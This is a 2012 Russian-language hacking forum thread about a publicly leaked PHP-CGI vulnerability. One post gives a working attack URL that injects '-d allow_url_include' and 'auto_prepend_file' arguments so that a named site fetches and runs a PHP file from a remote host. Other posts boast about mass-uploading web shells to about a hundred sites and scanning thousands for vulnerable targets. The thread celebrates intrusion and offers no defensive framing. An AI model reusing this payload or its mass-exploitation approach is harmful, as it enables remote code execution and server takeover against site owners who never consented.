Критическая уязвимость PHP случайно опубликована в открытом доступе

Discussion in 'Мировые новости. Обсуждения.' started by d3l3t3, 5 May 2012.

  1. cylaaaan

    cylaaaan Elder - Старейшина

    Joined:
    31 Aug 2006
    Messages:
    0
    Likes Received:
    44
    Reputations:
    8
    еб... работает, нихуасе
     
  2. FlooP1k

    FlooP1k Banned

    Joined:
    28 Jul 2010
    Messages:
    95
    Likes Received:
    66
    Reputations:
    48
    Все главные уязвимые сервер сейчас под ошибкой 500, это кто ж такой кривой мля.
    Или это кто то специально положил ...
     
  3. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Ага, и багу залатали!
     
  4. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    733
    Likes Received:
    73
    Reputations:
    19
    Одно дело посмотреть сорцы функц\модуля другое весь движок мозг выкипит.
     
  5. alextrust

    alextrust Member

    Joined:
    29 Mar 2010
    Messages:
    134
    Likes Received:
    27
    Reputations:
    11
    rekonn.ru/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp://boards.dishretailer.com/customavatars/404.php
    что то не то)
     
  6. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Пипец. Поздравляю, товарисчи. Наиболее популярные хостеры с сегодняшнего дня залатали дыру.

    Называется кто успел тот и съел.

    Из 1к свежих насканенных - пробив около 10% всего ((

    Масс хек не получится.

    З.Ы. Хорошо что вчера допоздна шеллы лил.
     
    _________________________
  7. alextrust

    alextrust Member

    Joined:
    29 Mar 2010
    Messages:
    134
    Likes Received:
    27
    Reputations:
    11
    BigBear
    а что ты хотел?
    уязвимость в паблке)
     
  8. [ Dumi ]

    [ Dumi ] Member

    Joined:
    27 May 2009
    Messages:
    21
    Likes Received:
    66
    Reputations:
    13
    второй год в паблике вроде как
     
  9. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Пруфлинк в студию!
     
  10. Chrome~

    Chrome~ Elder - Старейшина

    Joined:
    13 Dec 2008
    Messages:
    936
    Likes Received:
    162
    Reputations:
    27
    За тобой уже выехали.
     
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    А у каких были?
     
  12. .Varius

    .Varius Elder - Старейшина

    Joined:
    5 May 2009
    Messages:
    558
    Likes Received:
    289
    Reputations:
    42
    РБК
     
  13. BLurpi^_^

    BLurpi^_^ Banned

    Joined:
    9 Feb 2011
    Messages:
    218
    Likes Received:
    26
    Reputations:
    9
    хи, я листал сайты ЯК в поисках уязвимых, и как раз перед рбк почему то приостановился и потом перешел в другую категорию(
     
  14. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
    Наконец нашел время написать сканер. Сканил на наличие
    PHP:
    <?(php){0,1}
    Из 2000 проверенных сайтов ни одного уязвимого.

    Один только facebook.com/ :D
     
  15. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    у них же fastcgi вроде
     
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862

    Уязвимых сайтов все ещё дохрена. Тока с утра залился где-то на 100 ку сайтов.

    Фишка в том, что некоторые хостеры позволяют залить шелл тока через видоизменённый запрос.
     
    _________________________
  17. FlooP1k

    FlooP1k Banned

    Joined:
    28 Jul 2010
    Messages:
    95
    Likes Received:
    66
    Reputations:
    48
    вот только "ляпнуть" ...
     
  18. DeepBlue7

    DeepBlue7 Elder - Старейшина

    Joined:
    2 Jan 2009
    Messages:
    359
    Likes Received:
    50
    Reputations:
    12
    А ведь фейсбук какгбэ намекает ))
     
  19. Breetonia

    Breetonia New Member

    Joined:
    11 Dec 2011
    Messages:
    38
    Likes Received:
    1
    Reputations:
    0
    Я так и не понял,че она вдруг актуальной стала ? Ну,бага была известна,так че,никто не обратил внимание на неё ? Бред какой-то.

    хех,не знал,что фейс на фреймворке:

    PHP:
    <?php include_once 'https://www.facebook.com/careers/department?dept=engineering&req=a2KA0000000Lt8LMAS';
    Или это баг какой-то,что закрывающего тега нет ?

    А теперь по теме - неужели вам так впадлу поставить php-cgi на апаче?
     
  20. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Lol, на фейсбуке вовсе не бага. Таким образом они ищут себе специалистов.
     
Loading...